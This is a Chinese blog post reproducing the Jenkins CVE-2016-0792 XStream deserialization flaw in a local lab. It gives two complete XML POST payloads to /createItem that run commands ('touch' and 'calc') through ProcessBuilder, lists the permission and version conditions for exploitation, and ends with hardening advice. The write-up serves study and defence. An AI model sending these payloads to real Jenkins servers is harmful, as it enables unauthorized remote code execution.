Jenkins cve-2016-0792 漏洞复现 Xstream 反序列化漏洞

谁践踏了优雅 2021-08-31 08:25 490阅读 0赞

### 环境搭建 ###

首先需要安装jenkins，这里使用的是`1.642.1`版本，其他版本可以自行下载，在官网和百度一开始都是没找到的，包括看了其他人的分析，但是都没有找到环境搭建，大部分是直接复现和poc分析  
下载链接

http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war

这里需要在本地配置java环境，具体方法这里不在介绍，我复现使用的是java8

java -jar jenkins.war --httpPort=8080

httpport可以自定义之后访问 [http://127.0.0.1:8080/][http_127.0.0.1_8080]

可以打开即为搭建成功  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjQ1Nzgy_size_16_color_FFFFFF_t_70]

### 漏洞复现 ###

使用burp发送数据包

POST /createItem?name=foo HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.10.10.135:8080/newJob
    Cookie: JSESSIONID.51669330=2ma9elc96wwk16e4k07sq0ri9; screenResolution=1440x900
    Connection: keep-alive
    Content-Type: text/xml
    Content-Length: 889
    
    <map>
      <entry>
        <groovy.util.Expando>
          <expandoProperties>
            <entry>
              <string>hashCode</string>
              <org.codehaus.groovy.runtime.MethodClosure>
                <delegate class="java.lang.ProcessBuilder">
                  <command>
                    <string>touch</string>
            <string>/home/angelwhu/tmp/pwned</string>
                  </command>
                  <redirectErrorStream>false</redirectErrorStream>
                </delegate>
                <owner class="java.lang.ProcessBuilder" reference="../delegate"/>
                <resolveStrategy>0</resolveStrategy>
                <directive>0</directive>
                <parameterTypes/>
                <maximumNumberOfParameters>0</maximumNumberOfParameters>
                <method>start</method>
              </org.codehaus.groovy.runtime.MethodClosure>
            </entry>
          </expandoProperties>
        </groovy.util.Expando>
        <int>123</int>
      </entry>
    </map>

因为这里是使用本地的windows，所以修改一下command中间的参数

POST /createItem?name=foo HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.10.10.135:8080/newJob
    Cookie: JSESSIONID.51669330=2ma9elc96wwk16e4k07sq0ri9; screenResolution=1440x900
    Connection: keep-alive
    Content-Type: text/xml
    Content-Length: 889
    
    <map>
      <entry>
        <groovy.util.Expando>
          <expandoProperties>
            <entry>
              <string>hashCode</string>
              <org.codehaus.groovy.runtime.MethodClosure>
                <delegate class="java.lang.ProcessBuilder">
                  <command>
                    <string>calc</string>
                  </command>
                  <redirectErrorStream>false</redirectErrorStream>
                </delegate>
                <owner class="java.lang.ProcessBuilder" reference="../delegate"/>
                <resolveStrategy>0</resolveStrategy>
                <directive>0</directive>
                <parameterTypes/>
                <maximumNumberOfParameters>0</maximumNumberOfParameters>
                <method>start</method>
              </org.codehaus.groovy.runtime.MethodClosure>
            </entry>
          </expandoProperties>
        </groovy.util.Expando>
        <int>123</int>
      </entry>
    </map>

成功弹出计算器  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjQ1Nzgy_size_16_color_FFFFFF_t_70 1]

### 环境清理 ###

使用命令`java -jar jenkins.war --httpPort=8080`后会自动在用户目录下创建一个`.jenkins`文件夹，大约占用c盘100m左右的空间，

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjQ1Nzgy_size_16_color_FFFFFF_t_70 2]

在使用完后可以对其进行删除之后清理回收站

### 利用总结 ###

1. 权限限制条件：

无论匿名用户，还是登陆用户，权限必须具有“Overall的read权限和Job的create权限”两个权限（当然具有其他权限越多越好，若拥有administrater权限，其他任何权限都不是必须条件了，因为administrater为最高权限，故这里不考虑administrater）。因为该个漏洞是利用的createitem创建job的功能去调用api，所以create是必须的，而Jenkins最基本的权限是overall的read权限，用户必须赋予阅读的权限，不然什么都看不到。

2. 版本限制条件：

jenkins版本小于 1.650 （1.650版本已修复该问题）

3. post数据内容类型：

构造一个恶意的 XML 文档发送至服务端接口时，内容类型需注意为xml。

### 安全加固 ###

l 更新 Jenkins 至最新版本 1.650以上。

l jenkins做访问控制，收入内网不开放往外网。

l 禁止jenkins的匿名访问权限。

l 保证每个jenkins账号不为弱口令。

[http_127.0.0.1_8080]: http://127.0.0.1:8080/
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjQ1Nzgy_size_16_color_FFFFFF_t_70]: /images/20210728/2a60914f117441249ca31dcce375a431.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjQ1Nzgy_size_16_color_FFFFFF_t_70 1]: /images/20210728/2ba8f39176fb49fb8c669a5ecdeda5d1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjQ1Nzgy_size_16_color_FFFFFF_t_70 2]: /images/20210728/5e886ccd696f493697df7a606a884da1.png